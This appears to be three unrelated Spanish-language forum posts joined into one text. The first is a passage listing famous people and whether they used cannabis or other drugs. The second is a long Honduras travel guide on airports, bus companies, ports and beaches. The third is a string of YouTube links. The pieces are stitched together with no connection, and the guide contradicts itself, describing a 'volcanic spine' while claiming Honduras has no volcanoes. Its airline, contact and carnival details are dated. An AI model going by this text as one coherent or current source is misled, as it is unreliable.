Elvis Presley, músico HeEra adicto a las drogas que le recetaba su médico , más allá del faso.* Ernest Hemmingway, Escritor. No hay evidencia.* Herman Hesse, Escritor, No encontre evidencia* Hiero the Second. Otra vez.* Irvine Welsh, Escritor His Una de sus citas mas famosas habla de los “peligros” del cannabis* Jabir Ibn el-Hayyan, Alquimista.* Jackson Pollock, Artist,* Jerry Lee Lewis, músico. No hay evidencia* John Keats, poet. Un análisis de su cabello dió positivo en opio, pero no marihuana.* Julio Verne, Escritor Sin evidencia* Kelsey Grammar, Actor, “Fraiser”, Arrestado por poseción de cocaína* Kirk Douglas, actor.* Mary Tyler Moore, actress. actuó en un video llamado “How to bring up a Drug Free Child”* Marlon Brando, actor.* Mary Shelley, Escritor. No sabemos se fumaba cannabis, pero si Opio* Philip K. Dick, Escritor. Usaba mucho speed en forma legal, pero curiosamente no funcionaba en su metabolismo* Reina Arnegunde, Frankish. Vestía ropa hecha de hemp, pero nada sabemos de sus habitos psicoactivos* Robert Burns. Poet. La menciona en el poema I’m told, pero no hay pruebas de que haya fumado.* Robert ‘King’ Carter. Cultivaba tabaco, pero marihuana? No hay pruebas.* Roger Clinton, Hermano del ex-presidente de EEUU. Cocaina, si, pero no menciona el cannabis* Sigmund Freud. El padre del psicoanálisis aspiraba cocaína regularmente y realizo grandes investigaciones.* Tennessee Williams Escritor. El alcohol parecia ser su droga predilecta* Tom Lehrer. Declaró que nunca usó una droga También que el nunca mintió, jamás* Vincent Van Gogh, Artist. Otras plantas si, pero no cannabis.* Walt Disney, Productor de películas y escritor. nunca hiva a terminar de poner imagenes espero su comprencion...

Como Llegar Honduras está estratégicamente localizada en el corazón de Centroamérica rodeada por montañas tropicales, lo que hace que podamos tener una variedad de climas. Al norte esta limitada con el mar caribe, ofreciendo una amplia gama de hermosas playas, clima templado y gente amistosa. A escasa distancia de la costa, están las islas de la bahía rodeadas por el segundo arrecife coralino más grande del mundo. Al sur, Honduras esta limitada por el Océano pacífico y El Salvador, al oeste por Guatemala y al este por Nicaragua. La población actual se estima en más de 8 millones de habitantes. VIA AEREA Honduras se encuentra a dos horas de vuelo de las principales ciudades sureñas de los Estados Unidos de América: Miami, New Orleans y Houston. Existen también vuelos directos a los otros países del istmo centroamericano, servidas principalmente por Grupo TACA, COPA Airlines. Los aeropuertos internacionales con que cuenta Honduras son cuatro: * Aeropuerto Toncontín, ubicado en Tegucigalpa, M.D.C. , capital de la República. Líneas aéreas internacionales operando actualmente: American Airlines, Continental Airlines, Iberia y Taca. * Aeropuerto Ramón Villeda Morales, ubicado en San Pedro Sula, capital industrial Líneas aéreas internacionales operando actualmente: American Airlines, Continental Airlines,Taca y Copa. A partir del 01 de Julio, comenzará a operar Aeroméxico. * Aeropuerto Golosón, ubicado en Ciudad de la Ceiba, departamento de Atlántida. Líneas aéreas internacionales operando actualmente: Taca. * Aeropuerto Juan Manuel Gálvez, ubicado en Roatán, departamento de las Islas de la Bahía. Las Líneas aéreas internacionales operando actualmente: Taca, American y Continental. Vuelo Charter Milan-Roatán por Lauda Air. Mas Inf. de Vuelos clic aqui. VIA TERRESTRE La red de carreteras nacionales cuenta con 2,600 Km pavimentados y 11,464 Km en caminos de tierra. Dentro de la infraestructura terrestre se encuentra la carretera Panamericana, que cruza todo el país, abarcando las principales ciudades, lo que facilita aun más la transición de la misma y se encuentra en muy buen estado. Las principales empresas de transporte terrestre internacionales que llegan a Honduras son: TICA BUS: * 200 metros al norte y 100 metros al oeste de la Torre Mercedes, Paseo Colón, frente a la Funeraria del Magisterio Nacional. Telefax: (506) 2223-8776 Teléfono: (506) 2221-0006 Teléfono: (506) 2223-8680 HEDMAN ALAS: * San Salvador, El Salvador. La Calle El Progreso, número 2814, Teléfonos 00-503-230-51-00/01-02 * Guatemala: (502) 2362-5072 al 78 E-mail: [email protected] *San Pedro Sula – Ciudad Guatemala – Antigua (ida y vuelta) MONARCAS * 6 ave. Norte 60A, Tel: (502) 8321939 Antigua Guatemala KING QUALITY * Alameda Juan Pablo II y 19 Av. Norte San Salvador, El Salvador Tel. (503) 2271-1361 PULLMANTUR VIA MARITIMA * Empresa Nacional Portuaria Dirección: 1ª.Calle,1ª Avenida,B° El Centro Apartado Postal #18 Puerto Cortés E-mail: [email protected] La Empresa Nacional Portuaria (ENP) opera cinco puertos: * Puerto Cortés, ubicado a 64 Km de la ciudad de San Pedro Sula, es la mayor instalación portuaria de Centro América, brinda servicios las 24 horas y cuenta con modernas facilidades de carga y bodegaje así como 1,220 mts de muelle, con capacidad de acomodar 10 buques de 10,000 GRT a la vez. * Puerto La Ceiba, departamento de Atlántida. * Puerto Castilla en Trujillo, departamento de Colón. * Puerto Henecán, San Lorenzo, departamento de Valle en el Pacífico, cuenta con un canal de 8.54 mts de profundidad, 297.07 mts de muelle y tres bodegas. * Puerto Lempira, Gracias a Dios * Tela, Atlántida Ferry Galaxy (conexión entre La Ceiba y Las Islas de la Bahia ) El Ferry Galaxy tiene una capacidad para 350 pasajeros y cuenta con dos clases: La Clase Normal y la Clase Privada, ambas clases cuentan con aire acondicionado, televisor y en el area de cubierta cuenta con un deck para las personas que desean ir apreciando la vista. En la Clase Privada la capacidad es para 32 pasajeros y los asientos son pullmann, refrigerio incluído y van en la misma cabina del capitán. Acerca de Honduras Información General Geografía y Clima Situada en el corazón de Centroamérica, Honduras es el país más montañoso del área Centroamericana; mide más de 43,000 millas cuadradas, lo que la convierte en el segundo país más grande de la región. La espina dorsal volcánica en Honduras es la que separa los ecosistemas costeros de los océanos Pacífico y del Caribe, aunque cabe señalar que Honduras es el único país de América Central que no tiene volcanes. El 40% del país es selva tropical pero también tiene 600 millas de playas extraordinarias - de arena blanca en el lado caribeño y de arena negra en la costa del Pacífico. De junio a noviembre se desarrolla la "temporada de lluvias", aunque de diciembre a febrero suelen haber precipitaciones esporádicas. A pesar de que Honduras se encuentra en el trópico, es recomendable usar una chaqueta en las noches de diciembre y enero. Debido a que las tierras altas centrales son montañosas y cubiertas de pinos, existe una gran variedad de temperaturas, que van desde la calurosa y húmeda de la costa caribeña, hasta la suave e incluso fría en las zonas montañosas; predomina la temperatura calurosa y seca en el sur de la costa del Pacífico. La Costa del Caribe, que en su mayoría está conformada a lo largo por playas de agua cálida, se extiende por cerca de 500 millas desde la frontera occidental de Honduras donde limita con Guatemala, hasta la frontera oriental donde limita con Nicaragua. Las aproximadamente 62 millas que llevan a la salida del Océano Pacífico en el Golfo de Fonseca, separa a El Salvador hacia el oeste y a Nicaragua hacia el este. Las Islas de la Bahía de Honduras una vez fueron colonia británica, y hoy día son famosas en el mundo, clasificadas como sitio de primera clase a nivel mundial para practicar buceo. Buena parte de la tierra más fértil se encuentra en el Valle de Sula y en el Valle del Aguán, desarrollados por las compañías bananeras a principios del siglo 20. Otros cultivos importantes incluyen el café, la palma africana, piñas y caña de azúcar. La madera ha sido, durante mucho tiempo, una actividad económica importante, al igual que el ganado de pasteo. En la costa sur, el cultivo de camarones se ha convertido recientemente en una importante industria de exportación. Playas y Arrecifes Amapala Amapala una de las más bellas islas de honduras ubicada en el océano pacifico, es uno de los sitios de mayor interés para los turistas, ya que cuenta con playas de arena negra típicas del océano pacifico y un sin fin de riquezas. En el antiguo puerto de amapala se pueden apreciar los bellos atardeceres, a lado de amigos y familiares lo que hacen de ella una experiencia inolvidable, en las playas de amapala también nos encontraremos con aguas turbulentas y profundas lo cual puede disfrutar el turista de realizar actividades acuáticas más extremas, cuenta con seguridad para la tranquilidad del turista, con una iglesia al estilo colonial en la plaza central sus restaurantes son aptos para los gustos mas exigentes. Para movilizarse dentro del puerto están los famosos mototaxis que llevan al visitante a todas partes, al igual que existen los taxis mixtos que son carros de paila y las lanchas que transportan a las personas hasta esta bella isla. En esta isla encontraremos playas privadas muy limpias y bien conservadas, Actualmente , han sido muy visitadas por turistas la Playa Grande y Playa Negra, estando en vías de mejorarse su infraestructura y el acceso marítimo a la isla para todas aquellas personas que deseen disfrutar de ella. PRINCIPALES ATRACTIVOS Playa Negra Esta se caracteriza por sus arenas de color negro y desde ella se puede ver la isla de Meanguera del vecino país de El Salvador, si desea comer en la playa se encuentran champas donde puede disfrutar de las delicias marítimas que cuenta el golfo, también posee hoteles donde puede descansar cómodamente con su familia Cayos Cochinos Este pequeño pero hermoso grupo de cayos e islas del Caribe Hondureño está ubicado cerca de la costa casi frente a La Ceiba. El conjunto es visible desde esta ciudad puerto en día claro, y aun cuando parece una isla de mediano tamaño, la verdad es que es un conjunto de 13 cayos y pequeñas islas. Fue declarada Reserva biológica por el Congreso de la república, para conservar en el marco de la ley este paraíso terrenal que lo espera con sus mejores galas los 365 días del año. Dos de los cayos son de hecho pequeñas islas con una exuberante vegetación tropical que se conserva en un estado natural al no haber sido explotada por su difícil acceso. Una de ellas, Cochino Menor, es la base de operaciones e investigación del Parque Nacional Marino Cayos Cochinos, ahí encontrará laboratorios y cabañas destinadas al alojamiento de los científicos y guarda parques. Los cayos ofrecen una variedad de riquezas, las cuales comienzan a nivel submarino con los arrecifes más vírgenes de Honduras. Así mismo, ofrecen una riqueza con su abundante flora y fauna en tierra. Guanaja Bella isla caribeña rodeada de exhuberantes matices de colores, fauna y flora tropical. Su apacible mezcla de elementos hacen de esta pedacito de tierra un paraíso mítico que nutre el espiritú aventurero desplegando muchos parajes que le jugarán en armonica existencia. PRINCIPALES ATRACTIVOS Y SITIOS DE INTERES Rodeada de naturaleza virgen, bosque tropical, manglares y cristalinas cascadas son la perfecta combinación con las playas de arena blanca y dorada. Sus diafanas aguas , arrecifes coralinos y pinos caribeños junto a las típicas palmeras hacen de Guanaja un sitio diferente y único en Honduras. Su conjunto de bellezas maravillan a turistas que encuentran varios puntos de interes como los cayos BONNACA donde podrá llegar con pobladores de la isla. Ademas encontramos manglares, bosque tropical, ríos cascadas, arrecifes de coral y muchas actividades de buceo y pesca. Uno de los lugares más atractivos de Guanaja es la proyeccion que se divisa a una altura de 1369 pies desde el principal pico de la isla ACTIVIDADES A REALIZAR En Guanaja se pueden realizar diferentes actividades nauticas que van desde el kayak hasta la pesca. Además puedes realizar snorkel para interactuar en la barrera coralina. Puedes hacer windsurf y esquí acuático en un mar multicolor y super amigable. De igual manera se puede montar a caballo, hacer caminatas, adentrarse en la vegetación. RESEÑA HISTORICA Descubierta en 1502 por Cristóbal Colon. Guanaja impresiono al destacado Almirante Español debido a la abunancia de agua y bosque de conifera presente en cada rincón de tierra expuesta ante sus ojos. Esta experiencia marco tanto su viaje que decidio denomi narla Isla de Los Pinos en honor a la inmensidad, frondosidad y aromatizante esplendor de tan bella flora nacional. UBICACIÓN GEOGRAFICA Ubicada al norte de La República en las coordenadas 16.29 latitud norte 85.54 longitus oeste. El Soldado Beach, Guanaja Xatrus beach, Guanaja La Ceiba Sol, playa, arena y mucha diversión, describen a la cuidad mas bella y alegre de Honduras, no por nada su titulo de "La Novia de Honduras" o "Ceibita la Bella" como cariñosamente se le conoce en todo el país. Tal y como reza su eslogan "Lo mejor de la Ceiba es su Gente", así que preparece para ser recibido como se lo merece en un ambiente calido y amistoso que lo unico que pretende es que se divierta tanto que regrese pronto. La Ceiba localizada en la costa norte de Honduras, es la tercer ciudad del país, sin duda alguna la mas alegre de todas, además nombrada por el gobierno de la República como la capital del eco-turismo, ya que debido a su geografía reúne playas, ríos, bosques y una exuberante belleza natural, reservada en los Parques Nacionales " Pico Bonito " y "Cuero y Salado". En la Ceiba esta situado uno de los principales puerto de Honduras, desde donde podrá abordar el Galaxy , Ferry que lo llevara hacia las islas de Roatán y Utila. Nuestro recorrido por la ciudad de La Ceiba, puerto adonde lo mejor que encontrará es su cálida gente, la ciudad tiene ese nombre por un enorme árbol de Ceiba que según cuentan se necesitaban 50 hombres tomados de las manos para rodear el tronco. El equipo de Honduras es Así arribo desde San Pedro Sula vía terrestre en un viaje de aproximadamente 3 horas, 4 si lo hace por autobús desde el mismo destino o 7 si viene desde la capital. La Ceiba cuenta también con el aeropuerto Goloson, por lo que vía aérea recibe diariamente cientos de visitantes. SU CARNAVAL Todos los planes para el carnaval de la ceiba 2011 ya muy pronto estara listo antes de eso se esta realizando la planificacion de la semana santa y se estan limpiando ya las playas para que las chicas luscan sus trajes de baño en las playas hondureñas, la ceiba cuenta con la mejor zona viva del pais por eso mucha gente visita mucho el caribe Hondureño, ven para el carnaval de la ceiba a disfrutar de las miles de carrozas y el calor que solo nosotros te podemos dar baila hasta el amanecer con tus amigos en las mejores discotecas de la ciudad y del pais, toda la avenida san isidro se llena de alegria y diversion y este año las autoridades de la ciudad han programado un elexente calendario de actividades para que este carnaval asi como la eleccion de la reina de la feria isidra, tambien otras actividades como la eleccion de la Miss Playa, sea mucho mejor que en fechas pasadas, te invitamos a visitar la ceiba donde lo mejor esta en su gente. Roatán En esta bella Isla es un "Reino Celestial" como describe su nombre en lengua autóctona, ahí podrá apreciar una diversidad de recursos naturales, tanto terrestres como marinos, catalogada por muchos como el destino ideal para vivir la experiencia de visitar unos de los parajes mas hermosos del planeta. En Roatán como en las otras islas encontrara maravillas que saltan a sus ojos y de las que disfrutara sin ningún esfuerzo y secretos maravillosos que si bien tendrá que esforzarse un poco para descubrirlos, terminara totalmente satisfecho de haber tenido la oportunidad de disfrutarlos. Es muy facil llegar a Roatan lo puedes hacer via aerea desde las principales ciudades del pais o por ferri desde la ciudad de La Ceiba en un viaje de aproximadamente 40 minutos, por las azules aguas del mar caribe a bordo del Galaxy II. Si visitas Roatan no debes perderte de su gran rrecife de coral que ocupa el segundo lugar en tamaño y bio-diversidad a nivel mundial, la ventaja del arrecife de coral de Roatan es que esta a muy pocos metros de su costa y los visitantes lo pueden apreciarlo de cerca sin adentrarse demasiado en el mar. Tela Tela es una pequeña ciudad en la costa norte de Honduras en el departamento de Atlántida, es atrayente ya que posee las playas continentales más bellas del país, además cuenta con una vegetación inigualable. En Tela se encuentra el parque botánico Lancetilla que cuenta con una inmensidad de flora autóctona y especies foráneas que le brindaran un agradable paseo al aire libre. Otro atractivo en Tela es el parque nacional Punta Sal un lugar donde se puede practicar Snokel, ubicado a media hora en lancha desde Tela, Punta Sal cuenta con hermosos parajes y una playa de arena blanca increíble. Al igual podrá visitar Punta Izopo, localizado hacia el oriente de la bahía de tela a solo 12 Km. en este lugar se destacan animales como ser aves como loros, tucanes, tortugas, monos y lagartos, así como paseos en los canales que se forman entre los manglares y por donde es accesible el paso de canoas. Trujillo Trujillo paraíso de playas únicas protegidas por punta Castilla que dibuja una bahía en forma de piscina gigante, resguardada por la fortaleza de Santa Bárbara, una de las tres grandes fortalezas construidas en la época de la conquista y conservada para el deleite de los turistas. Ciudad conocida mundialmente por haberse celebrado aquí la primera misa en suelo continental en América, habiendo llegado Cristóbal Colon en su cuarto y ultimo viaje. Trujillo es un poblado ubicado en la zona norte del país, posee una de las playas más bellas de Honduras ubicadas en el mar caribe, en estas playas se puede apreciar excelentes atardeceres sobre Punta Castilla lo que esta entre los paisajes exuberantes y romanticos que ofrece Honduras. Encontrandose en Trujillo, podrá visitar la laguna de Guaimoreto un lugar en donde se pueden apreciar muchas especies de aves migratorias en un entorno totalmente natural. Otro sitio de interés en Trujillo es la hacienda del tumbador dedicada a la crianza de lagartos, ahi podra visitar tambien el parque de Capiro y Calentura, que ofrece un entorno natural dentro del cual puede nadar en las aguas termales o adentrarse en los frondosos bosques. Las actividades a realizar son muchas ya que Trujillo no solo cuenta con bellas playas típicas del mar caribe con arena blanca con palmeras y cocos asi como comedores tipicos con deliciosos frutos del mar, también encontrará diversos parques nacionales en lo que podra explorar nuestro territorio casi virgen. En Trujillo se puede hacer muchas actividades acuáticas como andar en la famosa banana, en lanchas y motos acuáticas para pasar una agradable tarde de playa. Utila Es una de las tres islas que conforman el departamento insular de islas de la bahía. Está localizada a solo 30 kilómetros de la costa norte de Honduras y tiene 11 kilómetros de largo y 4 km en su punto más ancho, lo que la hace una isla muy cómoda para explorar todos sus ambientes. El único pueblo de las Isla es Utila East Harbour tiene aproximadamente 3,000 habitantes que destacan por su alegría y hospitalidad, así como las hermosas caracolas (habitantes de las islas de la Bahía). El ingles es el lenguaje dominante, aunque la mayoría de los habitantes de la isla hablan también Español. La segunda cadena de arrecifes más grande del mundo se extiende a través de las islas de la Bahía donde la vida marina es rica y abundante, combinado con esto encontrara aguas cristalinas con visibilidad de hasta 500 mts. Lo que convierte a Utila en uno del os mejores lugares para el buceo junto con Roatán y Cayos cochinos, además se le considera una de los lugares mas baratos del mundo para estudiar y conseguir la certificación de buceo. Existe gran variedad de hospedaje en Utila, desde hostales para mochileros hasta lujosos resorts de clase mundial. Esto es todo Amigos Espero Les Guste y Pasen por Mi Pais

amigos aqui le pongo unos de los videos mas graciosos espero los disfruten https://ugc.kn3.net/s/http://www.youtube.com/v/xrv63gIXybE?fs=1&fs=1&version=3 link: http://www.youtube.com/watch?v=xrv63gIXybE https://ugc.kn3.net/s/http://www.youtube.com/v/2oc6nJ8_5pA?fs=1&fs=1&version=3 link: http://www.youtube.com/watch?v=2oc6nJ8_5pA https://ugc.kn3.net/s/http://www.youtube.com/v/2vljJoY4-Fg?fs=1&fs=1&version=3 link: http://www.youtube.com/watch?v=2vljJoY4-Fg https://ugc.kn3.net/s/http://www.youtube.com/v/Pyzo3GReM3Q?fs=1&fs=1&version=3 link: http://www.youtube.com/watch?v=Pyzo3GReM3Q https://ugc.kn3.net/s/http://www.youtube.com/v/a1AGyZY2wWw?fs=1&fs=1&version=3 link: http://www.youtube.com/watch?v=a1AGyZY2wWw https://ugc.kn3.net/s/http://www.youtube.com/v/Yw52vRIJOpw?fs=1&fs=1&version=3 link: http://www.youtube.com/watch?v=Yw52vRIJOpw https://ugc.kn3.net/s/http://www.youtube.com/v/NGFmkuczRYE?fs=1&fs=1&version=3 link: http://www.youtube.com/watch?v=NGFmkuczRYE https://ugc.kn3.net/s/http://www.youtube.com/v/zO-s7mP3dTk?fs=1&fs=1&version=3 link: http://www.youtube.com/watch?v=zO-s7mP3dTk https://ugc.kn3.net/s/http://www.youtube.com/v/2w2Zunj1mWU?fs=1&fs=1&version=3 link: http://www.youtube.com/watch?v=2w2Zunj1mWU https://ugc.kn3.net/s/http://www.youtube.com/v/JdwP4uUARnM?fs=1&fs=1&version=3 link: http://www.youtube.com/watch?v=JdwP4uUARnM https://ugc.kn3.net/s/http://www.youtube.com/v/rDmQ5NmnHS0?fs=1&fs=1&version=3 link: http://www.youtube.com/watch?v=rDmQ5NmnHS0